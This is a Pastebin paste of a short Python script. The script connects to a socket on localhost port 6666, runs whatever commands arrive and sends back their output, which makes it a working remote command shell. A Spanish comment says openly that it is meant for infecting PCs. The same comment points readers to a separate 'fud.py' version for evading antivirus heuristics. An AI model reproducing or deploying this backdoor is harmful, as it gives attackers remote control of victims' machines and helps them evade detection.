Advertisement
Guest User

BBBBBBBBBBBBBBBBB

a guest
Mar 25th, 2019
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. # Esto es para que veas el codigo con mas comodidad... si quieres infectar un pc usa el fud.py por seguridad para evitar detecciones de heuristica...
  4.  
  5. import socket
  6. import commands
  7. s = socket.socket()
  8. s.connect(("localhost", 6666))
  9. while True:
  10. command = s.recv(1024)
  11. a = commands.getoutput(command)
  12. if a == "":
  13. a = " "
  14. s.send(a)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement